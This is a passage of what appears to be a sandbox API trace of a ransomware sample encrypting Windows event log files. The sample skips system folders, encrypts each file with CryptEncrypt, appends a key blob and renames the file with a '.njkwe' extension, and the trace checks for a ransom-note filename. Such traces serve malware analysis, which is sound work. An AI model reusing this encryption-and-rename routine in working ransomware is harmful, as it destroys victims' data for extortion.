ftLastAccessTime.dwLowDateTime=0xcc1b5b23, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", cAlternateFileName="MI1F5D~1.EVT")) returned 1 [0066.882] lstrcmpiW (lpString1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", lpString2="Windows") returned -1 [0066.882] lstrcmpiW (lpString1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", lpString2="$Recycle.bin") returned 1 [0066.882] lstrcmpiW (lpString1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", lpString2="System Volume Information") returned -1 [0066.882] lstrcmpiW (lpString1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", lpString2="Program Files") returned -1 [0066.882] lstrcmpiW (lpString1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", lpString2="Program Files (x86)") returned -1 [0066.882] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx") returned 88 [0066.882] StrStrIW (lpFirst="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", lpSrch=".njkwe") returned 0x0 [0066.882] lstrcmpW (lpString1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.882] lstrcmpW (lpString1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", lpString2="taridd") returned -1 [0066.882] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.882] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.883] GetTickCount () returned 0x11511cf [0066.883] GetTickCount () returned 0x11511cf [0066.883] GetTickCount () returned 0x11511cf [0066.883] GetTickCount () returned 0x11511cf [0066.883] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.883] GetProcessHeap () returned 0xbe0000 [0066.883] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.883] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.885] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.885] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.885] GetProcessHeap () returned 0xbe0000 [0066.885] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0066.885] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.885] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.885] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.886] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.886] CloseHandle (hObject=0x428) returned 1 [0066.887] GetProcessHeap () returned 0xbe0000 [0066.887] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.888] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx_r00t_{3sXlE5}.njkwe") returned 108 [0066.888] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4operational.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.888] GetProcessHeap () returned 0xbe0000 [0066.888] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.888] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd74ac348, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd74ac348, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dace07, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-TWinUI%4Operational.evtx", cAlternateFileName="MIA925~1.EVT")) returned 1 [0066.888] lstrcmpiW (lpString1="Microsoft-Windows-TWinUI%4Operational.evtx", lpString2="Windows") returned -1 [0066.888] lstrcmpiW (lpString1="Microsoft-Windows-TWinUI%4Operational.evtx", lpString2="$Recycle.bin") returned 1 [0066.888] lstrcmpiW (lpString1="Microsoft-Windows-TWinUI%4Operational.evtx", lpString2="System Volume Information") returned -1 [0066.888] lstrcmpiW (lpString1="Microsoft-Windows-TWinUI%4Operational.evtx", lpString2="Program Files") returned -1 [0066.888] lstrcmpiW (lpString1="Microsoft-Windows-TWinUI%4Operational.evtx", lpString2="Program Files (x86)") returned -1 [0066.889] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx") returned 54 [0066.889] StrStrIW (lpFirst="Microsoft-Windows-TWinUI%4Operational.evtx", lpSrch=".njkwe") returned 0x0 [0066.889] lstrcmpW (lpString1="Microsoft-Windows-TWinUI%4Operational.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.889] lstrcmpW (lpString1="Microsoft-Windows-TWinUI%4Operational.evtx", lpString2="taridd") returned -1 [0066.889] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.889] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-twinui%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.889] GetTickCount () returned 0x11511de [0066.889] GetTickCount () returned 0x11511de [0066.889] GetTickCount () returned 0x11511de [0066.889] GetTickCount () returned 0x11511de [0066.889] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.889] GetProcessHeap () returned 0xbe0000 [0066.889] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.889] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.891] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.891] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.891] GetProcessHeap () returned 0xbe0000 [0066.891] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0066.891] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.891] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.891] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.891] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.892] CloseHandle (hObject=0x428) returned 1 [0066.893] GetProcessHeap () returned 0xbe0000 [0066.893] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.893] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx_r00t_{3sXlE5}.njkwe") returned 74 [0066.894] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-twinui%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-twinui%4operational.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.894] GetProcessHeap () returned 0xbe0000 [0066.894] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.894] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50aff605, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50aff605, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-User Profile Service%4Operational.evtx", cAlternateFileName="MI4D4C~1.EVT")) returned 1 [0066.894] lstrcmpiW (lpString1="Microsoft-Windows-User Profile Service%4Operational.evtx", lpString2="Windows") returned -1 [0066.894] lstrcmpiW (lpString1="Microsoft-Windows-User Profile Service%4Operational.evtx", lpString2="$Recycle.bin") returned 1 [0066.894] lstrcmpiW (lpString1="Microsoft-Windows-User Profile Service%4Operational.evtx", lpString2="System Volume Information") returned -1 [0066.894] lstrcmpiW (lpString1="Microsoft-Windows-User Profile Service%4Operational.evtx", lpString2="Program Files") returned -1 [0066.894] lstrcmpiW (lpString1="Microsoft-Windows-User Profile Service%4Operational.evtx", lpString2="Program Files (x86)") returned -1 [0066.894] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx") returned 68 [0066.894] StrStrIW (lpFirst="Microsoft-Windows-User Profile Service%4Operational.evtx", lpSrch=".njkwe") returned 0x0 [0066.894] lstrcmpW (lpString1="Microsoft-Windows-User Profile Service%4Operational.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.894] lstrcmpW (lpString1="Microsoft-Windows-User Profile Service%4Operational.evtx", lpString2="taridd") returned -1 [0066.894] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.894] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-user profile service%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.895] GetTickCount () returned 0x11511de [0066.895] GetTickCount () returned 0x11511de [0066.895] GetTickCount () returned 0x11511de [0066.895] GetTickCount () returned 0x11511de [0066.895] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.895] GetProcessHeap () returned 0xbe0000 [0066.895] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.895] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.903] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.903] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.903] GetProcessHeap () returned 0xbe0000 [0066.903] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0066.903] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.903] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.903] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.903] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.903] CloseHandle (hObject=0x428) returned 1 [0066.906] GetProcessHeap () returned 0xbe0000 [0066.906] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.906] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx_r00t_{3sXlE5}.njkwe") returned 88 [0066.906] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-user profile service%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-user profile service%4operational.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.906] GetProcessHeap () returned 0xbe0000 [0066.907] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.907] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50981e6e, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50981e6e, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-UserPnp%4ActionCenter.evtx", cAlternateFileName="MI5FF0~1.EVT")) returned 1 [0066.907] lstrcmpiW (lpString1="Microsoft-Windows-UserPnp%4ActionCenter.evtx", lpString2="Windows") returned -1 [0066.907] lstrcmpiW (lpString1="Microsoft-Windows-UserPnp%4ActionCenter.evtx", lpString2="$Recycle.bin") returned 1 [0066.907] lstrcmpiW (lpString1="Microsoft-Windows-UserPnp%4ActionCenter.evtx", lpString2="System Volume Information") returned -1 [0066.907] lstrcmpiW (lpString1="Microsoft-Windows-UserPnp%4ActionCenter.evtx", lpString2="Program Files") returned -1 [0066.907] lstrcmpiW (lpString1="Microsoft-Windows-UserPnp%4ActionCenter.evtx", lpString2="Program Files (x86)") returned -1 [0066.907] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx") returned 56 [0066.907] StrStrIW (lpFirst="Microsoft-Windows-UserPnp%4ActionCenter.evtx", lpSrch=".njkwe") returned 0x0 [0066.907] lstrcmpW (lpString1="Microsoft-Windows-UserPnp%4ActionCenter.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.907] lstrcmpW (lpString1="Microsoft-Windows-UserPnp%4ActionCenter.evtx", lpString2="taridd") returned -1 [0066.907] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.907] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx" (normalized: "c:\\logs\\microsoft-windows-userpnp%4actioncenter.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.907] GetTickCount () returned 0x11511ee [0066.907] GetTickCount () returned 0x11511ee [0066.907] GetTickCount () returned 0x11511ee [0066.907] GetTickCount () returned 0x11511ee [0066.907] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.907] GetProcessHeap () returned 0xbe0000 [0066.907] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.907] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.909] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.909] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.909] GetProcessHeap () returned 0xbe0000 [0066.909] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0066.909] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.910] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.910] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.910] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.910] CloseHandle (hObject=0x428) returned 1 [0066.912] GetProcessHeap () returned 0xbe0000 [0066.912] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.912] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx_r00t_{3sXlE5}.njkwe") returned 76 [0066.912] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx" (normalized: "c:\\logs\\microsoft-windows-userpnp%4actioncenter.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-userpnp%4actioncenter.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.913] GetProcessHeap () returned 0xbe0000 [0066.913] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.913] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5095bc04, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5095bc04, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", cAlternateFileName="MIBD88~1.EVT")) returned 1 [0066.913] lstrcmpiW (lpString1="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", lpString2="Windows") returned -1 [0066.913] lstrcmpiW (lpString1="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", lpString2="$Recycle.bin") returned 1 [0066.913] lstrcmpiW (lpString1="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", lpString2="System Volume Information") returned -1 [0066.913] lstrcmpiW (lpString1="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", lpString2="Program Files") returned -1 [0066.913] lstrcmpiW (lpString1="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", lpString2="Program Files (x86)") returned -1 [0066.913] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx") returned 57 [0066.913] StrStrIW (lpFirst="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", lpSrch=".njkwe") returned 0x0 [0066.913] lstrcmpW (lpString1="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.913] lstrcmpW (lpString1="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", lpString2="taridd") returned -1 [0066.913] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.913] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx" (normalized: "c:\\logs\\microsoft-windows-userpnp%4deviceinstall.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.913] GetTickCount () returned 0x11511ee [0066.913] GetTickCount () returned 0x11511ee [0066.913] GetTickCount () returned 0x11511ee [0066.913] GetTickCount () returned 0x11511ee [0066.913] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.913] GetProcessHeap () returned 0xbe0000 [0066.913] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.913] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.915] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.916] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, 